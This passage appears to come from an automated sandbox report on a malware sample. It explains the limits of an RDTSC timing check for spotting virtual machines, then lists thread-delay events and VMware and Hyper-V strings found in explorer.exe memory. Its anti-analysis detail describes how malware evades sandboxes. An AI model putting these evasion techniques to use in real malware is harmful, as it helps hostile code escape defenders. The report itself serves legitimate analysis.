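Two caveats matter when reading this signature. A hypervisor that passes the TSC through without trapping does not widen the gap at all, so the check only catches environments that trap or instrument RDTSC (which is exactly what the sandbox's interceptor records here); and the same measurement is a quick self-test for an analysis guest, run before detonation to learn whether the sample will see an inflated delta. The report pairs this probe with NtDelayExecution and delayed threads, so an analyst should expect both time-based checks and sleep-based stalling from this family.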
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: explorer.exe, 0000000E.00000000.473119386.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000E.00000000.473071942.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000E.00000000.462518967.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000E.00000000.473071942.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000E.00000000.472871335.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000E.00000002.613477288.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000E.00000000.472871335.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000E.00000000.473119386.0000000008430000.00000004.00000001.sdmp